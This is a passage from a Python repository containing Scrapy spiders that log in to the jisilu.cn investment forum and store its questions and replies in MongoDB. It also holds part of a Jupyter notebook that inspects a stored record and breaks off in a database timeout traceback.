64 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
65 | 'Upgrade-Insecure-Requests': '1',
66 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
67 |
68 | yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True)
69 |
70 | def login(self, response):
71 | url = 'https://www.jisilu.cn/account/ajax/login_process/'
72 | username = decoder(config.jsl_user)
73 | jsl_password = decoder(config.jsl_password)
74 | data = {
75 | 'return_url': 'https://www.jisilu.cn/',
76 | 'user_name': username,
77 | 'password': jsl_password,
78 | 'net_auto_login': '1',
79 | '_post_type': 'ajax',
80 | }
81 |
82 | yield FormRequest(
83 | url=url,
84 | headers=self.headers,
85 | formdata=data,
86 | callback=self.parse,
87 | dont_filter=True
88 | )
89 |
90 | def parse(self, response, **kwargs):
91 | # print('登录后', response.text)
92 | focus_url = self.URL.format(self.start_page)
93 |
94 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_page, dont_filter=True,
95 | meta={'page': self.start_page})
96 |
97 | def parse_page(self, response):
98 |
99 | current_page = response.meta['page']
100 |
101 | nodes = response.xpath('//div[@class="aw-question-list"]/div')
102 | last_resp_date = None
103 |
104 | for node in nodes:
105 |
106 | each_url = node.xpath('.//h4/a/@href').extract_first()
107 | try:
108 | last_resp_date = node.xpath('.//div[@class="aw-questoin-content"]/span/text()').extract()[-1].strip()
109 | # '回复 • 2018-12-10 09:49 • 46335 次浏览'
110 | last_resp_date = re.search('• (.*?) •', last_resp_date).group(1)
111 | except:
112 | logging.error('failed to find date')
113 | continue
114 | else:
115 | # 访问详情
116 | # 替换成这个 'https://www.jisilu.cn/question/320215&sort_key=agree_count&sort=DESC'
117 | # '"https://www.jisilu.cn/question/336326"'
118 | if re.search('www.jisilu.cn/question/\d+', each_url):
119 | question_id = re.search('www\.jisilu\.cn/question/(\d+)', each_url).group(1)
120 |
121 | # if self.question_exist(question_id):
122 | # continue
123 |
124 | # print(f'{question_id}帖子不存在,下载')
125 |
126 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M')
127 | yield Request(url=self.DETAIL_URL.format(question_id), headers=self.headers,
128 | callback=self.check_detail,
129 | meta={'last_resp_date': last_resp_date, 'question_id': question_id})
130 |
131 | # 继续翻页
132 | # print(last_resp_date)
133 | if last_resp_date is not None and isinstance(last_resp_date,str):
134 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M')
135 |
136 | if last_resp_date is not None and (self.last_week < last_resp_date):
137 | # logging.info('last_resp_date ===== {}'.format(last_resp_date))
138 |
139 | current_page += 1
140 | yield Request(url=self.URL.format(current_page), headers=self.headers, callback=self.parse_page,
141 | meta={'page': current_page})
142 |
143 | def question_exist(self,_id):
144 | return True if self.collection.find_one({'question_id':_id},{'_id':1}) else False
145 |
146 | def compose_content(self,content_list):
147 | string = ""
148 | for line in content_list:
149 | line = line.strip()
150 | if len(line)>0:
151 | string+=line+'\n'
152 | return string
153 |
154 | def check_detail(self, response):
155 |
156 | if '您访问的资源需要购买会员' in response.text:
157 | return
158 |
159 | question_id = response.meta['question_id']
160 | last_resp_date=response.meta['last_resp_date']
161 | more_page = response.xpath('//div[@class="pagination pull-right"]')
162 |
163 | item = JslItem()
164 | item['last_resp_date'] = last_resp_date
165 |
166 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
167 | item['question_id'] = question_id
168 | content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]')
169 |
170 | content_html = content_node.extract_first() # 获取到源码
171 |
172 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
173 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
174 | # try:
175 | # content = ret[0].strip()
176 | # except Exception as e:
177 | # # logging.error(e)
178 | # content = None
179 |
180 | content_list = content_node.xpath('string(.)').extract()
181 | content_str = self.compose_content(content_list)
182 |
183 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
184 | # 'aw-question-detail-meta'
185 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
186 |
187 | url = response.url
188 |
189 | # 添加发起人
190 | try:
191 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
192 | except Exception as e:
193 | # logging.error(e)
194 | item['creator'] = None
195 |
196 | item['title'] = title.strip()
197 | item['content'] = content_str
198 | item['content_html'] = content_html
199 |
200 | try:
201 | item['resp_no'] = int(resp_no)
202 | except Exception as e:
203 | # logging.warning('没有回复')
204 | item['resp_no'] = 0
205 | if createTime is None:
206 | # print(title)
207 | # print(content)
208 | return
209 | item['createTime'] = createTime.replace('发表时间 ', '')
210 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
211 | item['url'] = url.strip().replace('&sort_key=agree_count&sort=DESC','')
212 |
213 | # 多页
214 | if more_page:
215 |
216 | total_resp_no = item['resp_no']
217 | total_page = total_resp_no // 100 + 1
218 | item['resp'] = []
219 |
220 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers,
221 | callback=self.multi_page_detail,
222 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page,
223 | 'item': item})
224 |
225 | else:
226 |
227 | resp_ = []
228 | # 回复内容
229 | for index, reply in enumerate(
230 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
231 | replay_user = reply.xpath(
232 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
233 | rep_content = reply.xpath(
234 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
235 | 'string(.)').extract_first()
236 | # rep_content = '\n'.join(rep_content)
237 |
238 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
239 | if agree is None:
240 | agree = 0
241 | else:
242 | agree = int(agree)
243 |
244 | resp_.append(
245 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
246 |
247 | item['resp'] = resp_
248 | item['only_add']=True
249 |
250 | yield item
251 |
252 | # 详情页
253 | def multi_page_detail(self, response):
254 |
255 | current_page = response.meta['page']
256 | item = response.meta['item']
257 | total_page = response.meta['total_page']
258 | question_id = response.meta['question_id']
259 |
260 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div')
261 |
262 | for index, reply in enumerate(
263 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
264 | replay_user = reply.xpath(
265 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
266 | rep_content = reply.xpath(
267 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
268 | 'string(.)').extract_first()
269 | if rep_content:
270 | rep_content = rep_content.strip()
271 | # rep_content = '\n'.join(rep_content)
272 |
273 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
274 | if agree is None:
275 | agree = 0
276 | else:
277 | agree = int(agree)
278 |
279 | item['resp'].append(
280 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
281 |
282 | current_page += 1
283 | # item['resp_no']=len(item['resp'])
284 | if current_page <= total_page:
285 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers,
286 | callback=self.multi_page_detail,
287 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page,
288 | 'item': item})
289 | else:
290 | item['only_add']=True
291 | yield item
292 |
--------------------------------------------------------------------------------
/jsl/spiders/questions.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import datetime
3 | import re
4 | import scrapy
5 | from scrapy import Request, FormRequest
6 | from jsl.items import JslItem
7 | from jsl import config
8 | import logging
9 | import pymongo
10 |
11 | # 遍历所有questions id 看从哪里开始
12 | class QuestionSpider(scrapy.Spider):
13 | name = 'questions'
14 |
15 | headers = {
16 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
17 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
18 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
19 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
20 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
21 | 'Referer': 'https://www.jisilu.cn/login/',
22 | 'Accept-Encoding': 'gzip,deflate,br',
23 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
24 | }
25 |
26 | POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}' # 发帖日期
27 | RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}' # 回帖按照日期
28 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC'
29 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}'
30 |
31 | # self.doc =
32 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
33 | db = pymongo.MongoClient(connect_uri)
34 | # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ,然后找到用户的id,在用户也的源码哪里可以找到 比如持有封基是8132
35 | # self.collection = self.db['db_parker']['jsl_20181108_allQuestion_test']
36 | collection = db['db_parker'][config.doc_name]
37 |
38 | def start_requests(self):
39 | login_url = 'https://www.jisilu.cn/login/'
40 | headers = {
41 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
42 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
43 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
44 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
45 | 'Upgrade-Insecure-Requests': '1',
46 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
47 |
48 | yield Request(url=login_url, headers=headers, callback=self.login, dont_filter=True)
49 |
50 | def login(self, response):
51 | url = 'https://www.jisilu.cn/account/ajax/login_process/'
52 | data = {
53 | 'return_url': 'https://www.jisilu.cn/',
54 | 'user_name': config.jsl_user,
55 | 'password': config.jsl_password,
56 | 'net_auto_login': '1',
57 | '_post_type': 'ajax',
58 | }
59 |
60 | yield FormRequest(
61 | url=url,
62 | headers=self.headers,
63 | formdata=data,
64 | callback=self.parse,
65 | )
66 |
67 | def question_exist(self,_id):
68 | return True if self.collection.find_one({'question_id':_id},{'_id':1}) else False
69 |
70 | def parse(self, response,**kwargs):
71 | lastest_id = config.LASTEST_ID #
72 |
73 | for i in range(lastest_id + 5000, 1, -1):
74 | if not self.question_exist(lastest_id):
75 | focus_url = 'https://www.jisilu.cn/question/{}'.format(i)
76 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item, meta={'question_id': str(i)})
77 | def compose_content(self,content_list):
78 | string = ""
79 | for line in content_list:
80 | line = line.strip()
81 | if len(line)>0:
82 | string+=line+'\n'
83 | return string
84 |
85 | def parse_item(self, response):
86 | item = JslItem()
87 | question_id = response.meta['question_id']
88 |
89 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
90 |
91 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
92 |
93 | # if s:
94 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
95 | # else:
96 | # ret = None
97 |
98 | # try:
99 | # content = ret[0].strip()
100 | # except:
101 | # content = None
102 |
103 |
104 | content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]')
105 |
106 | content_html = content_node.extract_first() # 获取到源码
107 |
108 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
109 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
110 | # try:
111 | # content = ret[0].strip()
112 | # except Exception as e:
113 | # # logging.error(e)
114 | # content = None
115 |
116 | content_list = content_node.xpath('string(.)').extract()
117 | content_str = self.compose_content(content_list)
118 |
119 |
120 |
121 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
122 | if createTime is None:
123 | return
124 |
125 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
126 |
127 | url = response.url
128 |
129 | # 添加发起人
130 | try:
131 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
132 | except Exception as e:
133 | print(e)
134 | item['creator'] = None
135 |
136 |
137 | try:
138 | title = title.strip()
139 | except Exception as e:
140 | title = None
141 |
142 | item['content'] = content_str
143 |
144 | item['content_html'] = content_html
145 |
146 | try:
147 | item['resp_no'] = int(resp_no)
148 | except Exception as e:
149 | # logging.warning(e)
150 | # logging.warning('没有回复')
151 | item['resp_no'] = 0
152 |
153 | item['title'] = title
154 | item['question_id'] = question_id
155 |
156 | createTime = createTime.strip()
157 |
158 | if not re.search('^\d', createTime):
159 | createTime = createTime.replace('发表时间 ', '')
160 | # createTime = None
161 | # self.logger.error('创建日期有误:{}'.format(url))
162 | if not re.match('\d{4}-\d{2}-\d{2} \d{2}:\d{2}', createTime):
163 | self.logger.error('创建日期有误:{}'.format(url))
164 | self.logger.error(createTime)
165 | createTime = None
166 | #
167 | item['createTime'] = createTime
168 | item['url'] = url.strip().replace('&sort_key=agree_count&sort=DESC','')
169 |
170 | resp = []
171 | last_resp_date = None
172 | for index, reply in enumerate(
173 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
174 | replay_user = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
175 |
176 | if last_resp_date is None:
177 | last_resp_date = reply.xpath('.//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first()
178 |
179 | rep_content = reply.xpath(
180 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first()
181 | # print rep_content
182 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
183 | try:
184 | int(agree)
185 | except:
186 | agree = 0
187 |
188 | resp.append({replay_user.strip() + '_{}'.format(index): [int(agree), rep_content.strip()]})
189 | # item['html'] = response.text
190 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
191 |
192 | item['resp'] = resp
193 | item['last_resp_date'] = last_resp_date
194 | item['only_add'] = True
195 | yield item
196 |
197 | def check_detail(self, response):
198 |
199 | if '您访问的资源需要购买会员' in response.text:
200 | return
201 |
202 | question_id = response.meta['question_id']
203 | more_page = response.xpath('//div[@class="pagination pull-right"]')
204 |
205 | item = JslItem()
206 | last_resp_date = None # 后期更新
207 |
208 | item['last_resp_date'] = last_resp_date
209 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
210 | s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
211 | ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
212 | item['question_id'] = question_id
213 |
214 | try:
215 | content = ret[0].strip()
216 | except Exception as e:
217 | logging.error(e)
218 | content = None
219 |
220 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
221 | # 'aw-question-detail-meta'
222 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
223 |
224 | url = response.url
225 |
226 | # 添加发起人
227 | try:
228 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
229 | except Exception as e:
230 | logging.error(e)
231 | item['creator'] = None
232 |
233 | item['title'] = title.strip()
234 | item['content'] = content
235 | try:
236 | item['resp_no'] = int(resp_no)
237 | except Exception as e:
238 | # logging.warning('没有回复')
239 | item['resp_no'] = 0
240 |
241 | item['createTime'] = createTime.replace('发表时间 ', '')
242 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
243 | item['url'] = url.strip()
244 | # item['html'] = response.text
245 | item['last_resp_date'] = response.meta['last_resp_date']
246 |
247 | # 多页
248 | if more_page:
249 |
250 | total_resp_no = item['resp_no']
251 | total_page = total_resp_no // 100 + 1
252 | item['resp'] = []
253 |
254 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers,
255 | callback=self.multi_page_detail,
256 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page,
257 | 'item': item})
258 |
259 | else:
260 |
261 | resp_ = []
262 | # 回复内容
263 | for index, reply in enumerate(
264 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
265 | replay_user = reply.xpath(
266 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
267 | rep_content = reply.xpath(
268 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
269 | 'string(.)').extract_first()
270 | # rep_content = '\n'.join(rep_content)
271 |
272 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
273 | if agree is None:
274 | agree = 0
275 | else:
276 | agree = int(agree)
277 |
278 | resp_.append(
279 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
280 |
281 | item['resp'] = resp_
282 |
283 | yield item
284 |
285 | # 详情页
286 | def multi_page_detail(self, response):
287 |
288 | current_page = response.meta['page']
289 | item = response.meta['item']
290 | total_page = response.meta['total_page']
291 | question_id = response.meta['question_id']
292 |
293 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div')
294 |
295 | for index, reply in enumerate(
296 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
297 | replay_user = reply.xpath(
298 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
299 | rep_content = reply.xpath(
300 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
301 | 'string(.)').extract_first()
302 | if rep_content:
303 | rep_content = rep_content.strip()
304 | # rep_content = '\n'.join(rep_content)
305 |
306 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
307 | if agree is None:
308 | agree = 0
309 | else:
310 | agree = int(agree)
311 |
312 | item['resp'].append(
313 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
314 |
315 | current_page += 1
316 |
317 | if current_page <= total_page:
318 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers,
319 | callback=self.multi_page_detail,
320 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page,
321 | 'item': item})
322 | else:
323 | yield item
324 |
--------------------------------------------------------------------------------
/数据迁移.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "code",
5 | "execution_count": 30,
6 | "metadata": {},
7 | "outputs": [],
8 | "source": [
9 | "import pymongo\n",
10 | "from elasticsearch import Elasticsearch"
11 | ]
12 | },
13 | {
14 | "cell_type": "code",
15 | "execution_count": 31,
16 | "metadata": {},
17 | "outputs": [],
18 | "source": [
19 | "db = pymongo.MongoClient('10.18.6.46',27001)"
20 | ]
21 | },
22 | {
23 | "cell_type": "code",
24 | "execution_count": 32,
25 | "metadata": {},
26 | "outputs": [],
27 | "source": [
28 | "es = Elasticsearch(['10.18.6.102:9200'])"
29 | ]
30 | },
31 | {
32 | "cell_type": "code",
33 | "execution_count": 11,
34 | "metadata": {},
35 | "outputs": [],
36 | "source": [
37 | "doc = db['db_parker']['jsl']"
38 | ]
39 | },
40 | {
41 | "cell_type": "code",
42 | "execution_count": 12,
43 | "metadata": {},
44 | "outputs": [],
45 | "source": [
46 | "item = doc.find_one()"
47 | ]
48 | },
49 | {
50 | "cell_type": "code",
51 | "execution_count": 13,
52 | "metadata": {
53 | "scrolled": true
54 | },
55 | "outputs": [
56 | {
57 | "data": {
58 | "text/plain": [
59 | "{'_id': ObjectId('5c249f29c4c05d4ba4bfa49d'),\n",
60 | " 'creator': 'greatbear',\n",
61 | " 'title': '各位研究技术指标有什么心得体会?',\n",
62 | " 'content': '各位研究技术指标多久了?研究这东西,能帮炒股赚钱么:)',\n",
63 | " 'resp_no': 11,\n",
64 | " 'createTime': '2018-12-14 08:38',\n",
65 | " 'crawlTime': '2019-03-16 09:54:43',\n",
66 | " 'url': 'https://www.jisilu.cn/question/297952',\n",
67 | " 'resp': [{'seeker24680_0': ['0', '可以说很多不明觉厉的词,适合用于忽悠别人,具体效果同风水先生。']},\n",
68 | " {'joyfulli_1': ['0',\n",
69 | " '首先要知道技术指标是怎么来的\\n对过去的数据进行统计分析,然后进行预测\\n说白了就是统计学\\n所以,学过统计学就知道技术分析怎么用了']},\n",
70 | " {'老高0813_2': ['0', '基本没卵用']},\n",
71 | " {'z383788052_3': ['0', '从来只看指标,只看k']},\n",
72 | " {'花园小琴_4': ['0', '看图形,一般只看低买高卖,但事后后悔,赚少了']},\n",
73 | " {'风险搬运工_5': ['0', '趋势(多和空)和震荡结合得做(同时做),不做单边、所谓轮动策略。\\n倾向于胜率低,赔率高的策略。']},\n",
74 | " {'smag_6': ['0', '基本不看指标,静下心感受波动,在波动中下注。。。']},\n",
75 | " {'海浪头头_7': ['0', '同意美棠子的看法']},\n",
76 | " {'jsl0900_8': ['0', '从技术指标上看,我可以预测所有交易标的的后续走势,至于准确不准确,那不是我关心的问题']},\n",
77 | " {'美棠子_9': ['4', '只是个辅助工具,基本面是核心,切不可颠倒主次。']},\n",
78 | " {'蔓越橘_10': ['0', '用于T一下可以,其他就算了吧。']}],\n",
79 | " 'last_resp_date': '2018-12-14 10:14'}"
80 | ]
81 | },
82 | "execution_count": 13,
83 | "metadata": {},
84 | "output_type": "execute_result"
85 | }
86 | ],
87 | "source": [
88 | "item"
89 | ]
90 | },
91 | {
92 | "cell_type": "code",
93 | "execution_count": 14,
94 | "metadata": {},
95 | "outputs": [],
96 | "source": [
97 | "keys= item.keys()"
98 | ]
99 | },
100 | {
101 | "cell_type": "code",
102 | "execution_count": 15,
103 | "metadata": {},
104 | "outputs": [
105 | {
106 | "data": {
107 | "text/plain": [
108 | "dict_keys(['_id', 'creator', 'title', 'content', 'resp_no', 'createTime', 'crawlTime', 'url', 'resp', 'last_resp_date'])"
109 | ]
110 | },
111 | "execution_count": 15,
112 | "metadata": {},
113 | "output_type": "execute_result"
114 | }
115 | ],
116 | "source": [
117 | "keys"
118 | ]
119 | },
120 | {
121 | "cell_type": "code",
122 | "execution_count": 34,
123 | "metadata": {},
124 | "outputs": [],
125 | "source": [
126 | "save_db = db['db_parker']['jsl_note']"
127 | ]
128 | },
129 | {
130 | "cell_type": "code",
131 | "execution_count": 24,
132 | "metadata": {},
133 | "outputs": [],
134 | "source": [
135 | "import datetime"
136 | ]
137 | },
138 | {
139 | "cell_type": "code",
140 | "execution_count": 37,
141 | "metadata": {
142 | "scrolled": true
143 | },
144 | "outputs": [
145 | {
146 | "ename": "AutoReconnect",
147 | "evalue": "10.18.6.46:27001: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。",
148 | "output_type": "error",
149 | "traceback": [
150 | "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
151 | "\u001b[1;31mTimeoutError\u001b[0m Traceback (most recent call last)",
152 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(self, request_id)\u001b[0m\n\u001b[0;32m 609\u001b[0m return receive_message(self.sock, request_id,\n\u001b[1;32m--> 610\u001b[1;33m self.max_message_size)\n\u001b[0m\u001b[0;32m 611\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mBaseException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
153 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\network.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(sock, request_id, max_message_size)\u001b[0m\n\u001b[0;32m 172\u001b[0m length, _, response_to, op_code = _UNPACK_HEADER(\n\u001b[1;32m--> 173\u001b[1;33m _receive_data_on_socket(sock, 16))\n\u001b[0m\u001b[0;32m 174\u001b[0m \u001b[1;31m# No request_id for exhaust cursor \"getMore\".\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
154 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\network.py\u001b[0m in \u001b[0;36m_receive_data_on_socket\u001b[1;34m(sock, length)\u001b[0m\n\u001b[0;32m 231\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 232\u001b[1;33m \u001b[0mchunk_length\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0msock\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mrecv_into\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmv\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mbytes_read\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 233\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mIOError\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mOSError\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0mexc\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
155 | "\u001b[1;31mTimeoutError\u001b[0m: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。",
156 | "\nDuring handling of the above exception, another exception occurred:\n",
157 | "\u001b[1;31mAutoReconnect\u001b[0m Traceback (most recent call last)",
158 | "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m()\u001b[0m\n\u001b[0;32m 1\u001b[0m \u001b[0murl_set\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mset\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 2\u001b[1;33m \u001b[1;32mfor\u001b[0m \u001b[0mitem\u001b[0m \u001b[1;32min\u001b[0m \u001b[0mdoc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mfind\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 3\u001b[0m \u001b[0mcreator\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'creator'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 4\u001b[0m \u001b[0mtitle\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'title'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 5\u001b[0m \u001b[0mcontent\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'content'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
